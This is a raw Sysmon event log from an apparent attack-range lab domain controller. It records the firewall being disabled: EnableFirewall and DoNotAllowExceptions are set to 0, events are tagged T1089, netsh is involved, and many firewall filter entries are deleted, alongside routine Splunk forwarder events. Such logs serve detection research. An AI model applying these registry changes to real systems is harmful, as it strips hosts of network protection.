13241300x80000000000000009321Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:39.349{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Options\EnablePacketQueueDWORD (0x00000000) 13241300x80000000000000009320Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1089SetValue2021-03-31 12:04:39.349{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\DoNotAllowExceptionsDWORD (0x00000000) 10341000x80000000000000009319Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.349{266CAFBE-646C-6064-1600-00000000AE01}15843848C:\Windows\system32\svchost.exe{266CAFBE-6556-6064-3201-00000000AE01}5092C:\Windows\system32\netsh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\fwbase.dll+1594|c:\windows\system32\fwbase.dll+13f6|c:\windows\system32\mpssvc.dll+6edd7|c:\windows\system32\mpssvc.dll+8bf86|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000009318Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:39.349{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x00000619) 
12241200x80000000000000009317Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{941dad9d-7b1a-4354-997b-00cf1aa9b35c} 12241200x80000000000000009316Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{935b7f48-0ede-44dd-9bc2-e00bb635cda3} 12241200x80000000000000009315Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{c42f1cd6-3a95-4ae2-a513-793c3ae610c7} 12241200x80000000000000009314Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{2db25e6c-f07a-44f4-b6c8-50a330d2790b} 12241200x80000000000000009313Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{2dd96961-5757-434f-b617-34e732517c0e} 12241200x80000000000000009312Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{0ccc96a3-8c5c-45e2-b80e-7e37b16cc1ad} 
12241200x80000000000000009311Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{a47525e2-725b-4888-8af1-ba5a60c04f4d} 12241200x80000000000000009310Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{c016105c-eb34-4519-a5fd-5f4e4ad4d18e} 12241200x80000000000000009309Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{074f7f68-ee10-428a-89d1-ba78f6c327ca} 12241200x80000000000000009308Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{0c3be01b-fe70-4cc4-89dc-c07996b67e6d} 12241200x80000000000000009307Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{c970a45d-57f9-4e32-a5bd-886a9662641e} 12241200x80000000000000009306Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{12c38916-82ac-4737-8f38-b6957ffebad6} 
12241200x80000000000000009305Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{0c41d586-9c19-4e01-9d66-b5b98a97576e} 12241200x80000000000000009304Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\BootTime\Filter\{dc95b53e-01cf-4058-821d-350b3d0d4676} 12241200x80000000000000009303Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{941dad9d-7b1a-4354-997b-00cf1aa9b35c} 12241200x80000000000000009302Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{935b7f48-0ede-44dd-9bc2-e00bb635cda3} 12241200x80000000000000009301Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{3697a558-3ed3-49be-a4c1-c1a4448653b4} 12241200x80000000000000009300Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{b6fdab6b-dcc6-43e3-99ce-7aeca65063a4} 
12241200x80000000000000009299Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{c42f1cd6-3a95-4ae2-a513-793c3ae610c7} 12241200x80000000000000009298Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{2db25e6c-f07a-44f4-b6c8-50a330d2790b} 12241200x80000000000000009297Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{375fb39b-08c6-40f2-bdf2-08fa63f970a2} 12241200x80000000000000009296Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{2dd96961-5757-434f-b617-34e732517c0e} 12241200x80000000000000009295Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{cbfb56db-3c85-4543-9bc2-76ea28cdd74e} 12241200x80000000000000009294Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{13bfd422-6f75-4408-8924-9400ec0cb19c} 
12241200x80000000000000009293Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{64e55933-15a5-495d-a928-ccca43d44875} 12241200x80000000000000009292Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{91ffecf0-0a9e-4572-95f1-a7111af86967} 12241200x80000000000000009291Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{0ccc96a3-8c5c-45e2-b80e-7e37b16cc1ad} 12241200x80000000000000009290Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{a47525e2-725b-4888-8af1-ba5a60c04f4d} 12241200x80000000000000009289Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{c016105c-eb34-4519-a5fd-5f4e4ad4d18e} 12241200x80000000000000009288Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{074f7f68-ee10-428a-89d1-ba78f6c327ca} 
12241200x80000000000000009287Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{0aa7fff8-919f-453c-928c-28a12122ba38} 12241200x80000000000000009286Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{b6b2ca61-fb98-4422-adc2-e7cf56b3680c} 12241200x80000000000000009285Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{5b0cb2e2-ab87-4974-9f1c-2f22a654eeb9} 12241200x80000000000000009284Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{07a24961-a760-4e80-b263-6d275e1b09cb} 12241200x80000000000000009283Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{1165065e-4996-4338-abaf-4b8556b4d431} 12241200x80000000000000009282Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{716b48eb-0a35-4a76-92ab-1d987230d288} 
12241200x80000000000000009281Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{be7cbdf4-b192-4aa5-94f8-1fb5c5ee07bc} 12241200x80000000000000009280Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{4d9581d2-aef8-4993-84cd-b986ced80d42} 12241200x80000000000000009279Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{0c3be01b-fe70-4cc4-89dc-c07996b67e6d} 12241200x80000000000000009278Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{c970a45d-57f9-4e32-a5bd-886a9662641e} 12241200x80000000000000009277Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{12c38916-82ac-4737-8f38-b6957ffebad6} 12241200x80000000000000009276Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{0c41d586-9c19-4e01-9d66-b5b98a97576e} 
12241200x80000000000000009275Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{f444c576-6e60-4ea2-9faa-80d57ed12cd2} 12241200x80000000000000009274Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:04:39.333{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Persistent\Filter\{dc95b53e-01cf-4058-821d-350b3d0d4676} 13241300x80000000000000009273Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:39.318{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Options\EnablePacketQueueDWORD (0x00000000) 13241300x80000000000000009272Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1089SetValue2021-03-31 12:04:39.318{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\EnableFirewallDWORD (0x00000000) 10341000x80000000000000009271Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.318{266CAFBE-646C-6064-1600-00000000AE01}15842192C:\Windows\system32\svchost.exe{266CAFBE-6556-6064-3201-00000000AE01}5092C:\Windows\system32\netsh.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\fwbase.dll+1594|c:\windows\system32\fwbase.dll+13f6|c:\windows\system32\mpssvc.dll+6edd7|c:\windows\system32\mpssvc.dll+8bf86|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009270Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.271{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-6556-6064-3201-00000000AE01}5092C:\Windows\system32\netsh.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009269Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.271{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-6556-6064-3201-00000000AE01}5092C:\Windows\system32\netsh.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009268Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.052{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D006D6907771EC75850AE4CB209541A5,SHA256=EFD8F57C69405F3FB7C7BBAD129280C370B7402190A0EA9A88085F00AEF7DCC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009471Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:40.098{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=771D09D7BDBD47853EAE006734E39CF5,SHA256=74EEF712CE8B53776A2D87A7603F8963685DEA5897BC8E2BD217C5507FACDBC1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009473Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:40.541{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53630-false10.0.1.12-8000- 
23542300x80000000000000009472Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:41.159{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0023D3784FC542C306363A25421DC9E,SHA256=C24154A606D1D67D88F4A21506555907447AD38E98C1239399C56DA29A9D7962,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009474Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:42.190{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DF0D179E3C4E6109C99478754FFAD8D,SHA256=107608B74E3522D242EDDA063A862C855E3FCFC59DB060283BED44C73D600135,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009475Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:43.204{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E692DCF69DAD6948886E1B331F26B8BE,SHA256=17BA1AC98E1F6355E51F3C023E2582D7E2A86335C7D35C9389AD59D7817B3417,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009486Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:44.734{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 25542500x80000000000000009485Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:44.718{266CAFBE-655C-6064-4201-00000000AE01}6936C:\Windows\System32\wbem\WMIADAP.exeImage is locked for access 10341000x80000000000000009484Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:44.718{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000009483Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:44.718{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009482Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:44.718{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009481Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
